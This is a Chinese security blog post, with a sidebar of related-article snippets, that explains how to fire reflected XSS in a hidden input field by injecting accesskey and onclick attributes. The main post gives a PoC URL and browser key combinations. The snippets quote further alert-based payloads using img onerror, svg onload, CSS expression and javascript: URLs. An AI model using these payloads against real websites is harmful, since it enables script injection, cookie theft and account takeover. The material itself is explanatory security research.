Hidden属性的input标签中XSS的触发方法

最新推荐文章于 2024-07-12 16:49:16 发布
最新推荐文章于 2024-07-12 16:49:16 发布
阅读量1.7w 收藏 9
点赞数
分类专栏: XSS 文章标签: 漏洞 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/change518/article/details/51024706
版权

今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:

<input type="hidden" name="returnurl" value="[USER INJECT]" />

正常情况下的XSS应当是:

http://victim/?value=” οnclick=”alert(document.domain)

但是这里由于该input 未在页面中显示,常用的onclick 方法无法使用(点不到这个标签怎么触发onclick…),不过在浏览器中还有一个好玩的属性叫accesskey 于是乎构造:

<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />

PoC为:

http://victim/?returnurl=” accesskey=”X” οnclick=”alert(document.domain)

触发方法不同的浏览器不同,下面是w3school的总结
accesskey
所以上面的XSS触发方法为:
FF下:shift+alt+X (测试成功)
Chrome:alt+X (最新版Chrome未测试成功)
IE下:alt+X (未测试成功)

changetjut
关注
专栏目录
怎么使用input执行xss攻击_XSS场景及修复方案总结
weixin_32562973的博客
01-16 4655
xss原理跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意javaScript代码,当用户浏览该页之时,嵌入其Web里面的javaScript代码会被执行,从而达到恶意攻击用户的目的。xss分类反射型存储型DOM型xss场景和防御1. 恶意数据出现在标签内<body> ...恶意数据 </body>漏洞代码Strin...
XSS challenges闯关笔记
south_layout的博客
05-07 986
stage-1 没有过滤的XSS 很简单,闭合b标签注入payload即可。 payload: 123qwe"</b><script>alert(document.domain)</script> stage-2 标签属性XSS 与stage-1没有区别,闭合标签即可。 payload: 123qwe"><script>alert(d...
不可见(hiddeninput标签触发XSS
weixin_33963594的博客
12-29 1181
在寻找XSS的过程,会发现从POST或者URL参数拿到INPUT存放,但这些input都是hidden不可见的,通过F12调试,查看构造出来的代码确实存在点击事件,但是总是触发不了 通过网上查询资料,最总找到使用一个比较高级一点属性accesskey=""来触发不可见标签事件,accesskey是HTML语言标签的一个全局属性 <input type="hidden" name="...
在vue2对el-inputinput进行xss输入脚本攻击防护
最新发布
ChineseNamed的博客
07-12 476
使用vue2自定义指令挂载DOMpurify组件进行自定义快速防护xss输入脚本攻击
隐藏参数XSS
qq_43776408的博客
07-29 625
HTML表单隐藏 burp抓包测试 抓包发现 即便是hidden属性的值 在抓到包之后也能看到值 值为hackme 第四关 第四关的题和第三关表面看一样 HTML的svg介绍 闭合触发XSS 第一个双引号是为了闭合前面的引号 %0a个人感觉是换行的 感觉和下面的和svg没关系啊 你直接找hidden 找打了hidden就用这一篇讲的方法 你可以现在burp对p1和p2参数进行测试 直接写入代码 发现不行 第三关对p1参测试不可以 但是第三关对p2参数测试可以 现在是对p1和p2测试都不可以 都把
【应用安全——XSSinput-hidden
Fly_鹏程万里
02-22 814
1、使用expression突破 &lt;input type=hidden style="x:expression(alert(/xss/))"&gt; 直接利用CSS的expression属性来实现突破,此技巧适用于IE6及以下的浏览器。 2​、使用accesskey突破 &lt;input type="hidden" accesskey="X" onclick="alert(/x...
几种极其隐蔽的XSS注入的防护
sundaydashu的专栏
08-29 550
XSS注入的本质就是: 某网页根据用户的输入, 不期待地生成了可执行的js代码, 并且js得到了浏览器的执行. 意思是说, 发给浏览器的字符串, 包含了一段非法的js代码, 而这段代码跟用户的输入有关. 常见的XSS注入防护, 可以通过简单的 htmlspecialchars(转义HTML特殊字符), strip_tags(清除HTML标签) 来解决, 但是, 还有一些隐蔽的XSS注入不
第四节 隐藏提交参数XSS-01
09-15
闭合触发XSS可以使攻击者在用户的浏览器执行恶意脚本,导致安全问题。 总结 ---- 本节课程主要讲解了隐藏提交参数XSS攻击,包括HTML表单隐藏参数、Burpsutie抓包测试、HTMLSVG介绍和闭合触发XSS等知识点。...
Input hidden Monitor-crx插件
04-01
Input hidden Monitor-crx插件】是一款专为监控和检测网页隐藏输入元素变化而设计的浏览器扩展程序。这款插件主要适用于JavaScript环境,能够帮助开发者、测试人员以及网络安全专家实时跟踪那些通过JavaScript...
XSS常见问题
oxygensss的博客
12-08 2936
XSS的原理分析与解剖常见问题 1.xss的本质是什么 我们的传参被拼接进HTML页面,并且被执行。 2.xss如何执行 通过拼接恶意的html代码,js语句来执行攻击,实际上为html代码注入 3.xss作用 盗用cookie,得到内网ip,获取保存的密码等 4.如何检测xss 通过一个经典语句弹窗检测 5.xss还可以通过什么来执行 通过事件,伪协议来执行 6.伪协议是什么 一种不同与真实协议的协议,只有关联应用才可以用(例如:javascript:alert(1)) 7.事件是什么 这里的事件就是指j
xss漏洞简析(干货)
Haowill的博客
06-23 4975
xss漏洞 获取cookie: 指向其他url: HTML事件触发XSS:<svg onload/οnclick=“alert(document.domain);”> javascript伪协议:javascript:alert(document.domain); 列: xss漏洞介绍 跨站脚本攻击(cross site scripting),缩写xss 恶意攻击者往web页面里插入script代码,当用户浏览该页面时,嵌入到其web页面的script代码就会执行,从而达到恶意攻击者攻击用
XSS小游戏
a1b2c3是弱口令
07-17 4775
XSS小游戏 level 1 一开始界面上什么都没有,一般是从url上想办法顺便查一下php代码, &amp;amp;amp;amp;amp;lt;script&amp;amp;amp;amp;amp;gt; window.alert = function() { confirm(&amp;amp;amp;amp;quot;完成的不错!&amp;amp;amp;amp;quot;); window.location.href=&amp;amp;amp
XSS漏洞-常见标签
weixin_61143354的博客
09-17 1649
网络安全笔记
XSS常见的触发标签
LYJ20010728的博客
05-06 1万+
无过滤情况 <script> <scirpt>alert("xss");</script> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onm
如何获取提交后的input标签的值_利用XSS获取用户明文账户密码
weixin_39821330的博客
12-03 373
我们知道在浏览器存在这样一个功能,当用户登录成功了一个网页后,浏览器会提示我们是否保存密码。如果我们点击同意,那么浏览器就会将账户及密码进行保存。当我们退出账户再次访问登录页面的时候,我们会发现浏览器已经将我们保存好了的账户及密码填写到了对应的输入框内。如图。那么浏览器是如何识别到这个网页并自动填充好密码的呢,首先,浏览器需要知道我们访问的这个域名是否有保存过账户及密码。然后他会去查询网...
XSSlabs靶场以及通过浏览器编码深入xss绕过
wanan的博客
10-09 736
XSSlabs靶场以及通过浏览器编码深入xss绕过
渗透测试-XSS漏洞检测
热门推荐
道阻且长,行则将至。
09-11 1万+
反射型 Low 界面如图所示: 查看后台源码: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for ...
【原创】XSS攻击总结
yiran1919的博客
11-26 1423
一、XSS定义 xss的形成原理 xss 文名是“跨站脚本攻击”,英文名“Cross Site Scripting”。 Cross-site scripting的英文首字母缩写本应为CSS,但因为CSS在网页设计领域已经被广泛指层叠样式表(Cascading Style Sheets),所以将Cross(意为“交叉”)改以交叉形的X做为缩写。其原理是攻击者向有XSS漏洞的网站输入(传入)恶意的脚本代码(HTML、JavaScript),当其它用户访问含有恶意代码的页面,恶意脚本就会被浏览器解析执行
IECSS触发XSS攻击:技巧与绕过
在本节,我们将深入探讨在IE浏览器利用CSS进行跨站脚本攻击(XSS,Cross-Site Scripting)的第十四节内容。首先,让我们回顾一下CSS(层叠样式表)的基本概念。CSS是一种用于描述网页外观和布局的语言,它允许...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值